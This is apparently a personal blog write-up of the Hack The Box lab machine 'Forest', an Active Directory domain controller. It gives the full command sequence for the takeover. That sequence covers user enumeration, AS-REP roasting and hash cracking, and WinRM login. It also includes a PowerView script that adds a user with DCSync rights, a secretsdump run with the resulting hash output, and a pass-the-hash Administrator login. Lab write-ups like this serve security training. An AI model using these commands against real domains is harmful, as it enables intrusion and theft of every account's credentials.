Forest
Let's start off with nmap:
nmap -sC -sV -oA nmap/ -T4 10.129.95.210
Results:
Nmap scan report for 10.129.95.210
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-13 13:18:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m49s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-01-13T13:18:14
|_ start_date: 2023-01-13T13:14:57
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-01-13T05:18:15-08:00
Ports 53 and 88 are open which indicates that we are dealing with Active Directory and a Domain Controller to be more specific! Also, we get a domain name: htb.local.
Null sessions are not enabled on target but we can do some enumerating via rpc using rpcclient!
rpcclient -U "" -N 10.129.95.210
There is alot of interesting info we can query via rpcclient:
enumdomusers
Users are all we need but we also could use commands like
enumdomgroups
To get list of all the groups and their RID:s,
querygroupmem <RID>
To list users of a specific group and
queryuser <RID>
To show more detailed info of user!
Next step is to see what we can do with just usernames, one technique is AS-REP Roasting which is basically a feature of Kerberos that when Kerberos preauthentication disabled anyone can query (AS-REP) message that contains a Ticket Granting Ticket (TGT) issued by the Key Distribution Center (KDC), which is used for future access requests by the user. Good article on this can be found here
This can be exploited with impacket-script GetNPUsers.py. Before running add users found before to users.txt file and then run:
GetNPUsers.py htb.local/ -dc-ip 10.129.95.210 -usersfile users.txt -format hashcat -outputfile hashes.txt
Output lists us users that the method didn't work but we get one hash on our file hashes.txt! Next step is to crack that in hashcat:
./hashcat.exe hashes.txt rockyou.txt
And we get user svc-alfresco password! Which is 's3rvice'.
Next step is to login to the box using evil-winrm:
evil-winrm -u svc-alfresco -p s3rvice -i 10.129.95.210
We get in! Next let's enumerate the machine using Bloodhound! With Evil-WinRM we can directly download/upload files in addittion to executing powershell commands. Let's upload SharpHound.ps1 to the machine:
upload SharpHound.ps1
After uploading the file first import it's functions by running:
. ./SharpHound.ps1
Now we can call functions on the Evil-WinRM/Powershell session. Let's run the default gathering function:
Invoke-BloodHound -CollectionMethod All
This command generates a zip file on the same folder you run it. Let's download the file:
download 20230113103531_BloodHound.zip
Next, let's open bloodhound and import the zip file and start enumerating.
Our target is Domain Admin so let's use one of Bloodhound's default analysis paths:
The initial result gives a path that I didn't manage to execute, so let's remove it:
The great thing about Bloodhound is that when it manages to give a correct path, it even tells us which tools we could try to use and powershell commands! I'm not going to paste the Bloodhound instructions but you can check the steps from the images below:
Basically, our user svc-alfresco group is member of service accounts-group which is member of privileged it accounts-group which is member of Account operators-group which has full access to Exchange windows permission-group which have permissions to modify the DACL (Discretionary Access Control List) on the domain. So, what we need to do is add our current user to Exchange Windows Permission Group and then add the same user to DACL.
To do this first we need to download powerview.ps1 and upload it to the machine using Evil-WinRM.
Next, create a file script.ps1 with contents:
Import-Module .\powerview.ps1
net user zolaboo password /add /domain
net group "Exchange Windows Permissions" /add zolaboo
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\zolaboo', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'zolaboo' -TargetIdentity 'DC=htb,DC=local' -Rights DCSync
This script loads powerview functions, creates a new user and adds it to group, after that it grants it DCSync rights.
Upload it to the machine:
Next, run the script with
./script.ps1
Now run secretsdump on your attack machine:
secretsdump.py zolaboo:password@10.129.95.210
And we get hashes!
joonas@joonas-VirtualBox:~/Documents/htb/forest$ secretsdump.py zolaboo:password
@10.129.95.210
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_deni
ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d
32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
With Adminstrator NTLM hash we can login to the machine as admin using Evil-WinRM!
evil-winrm -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 -i 10.129.95.210
To be continued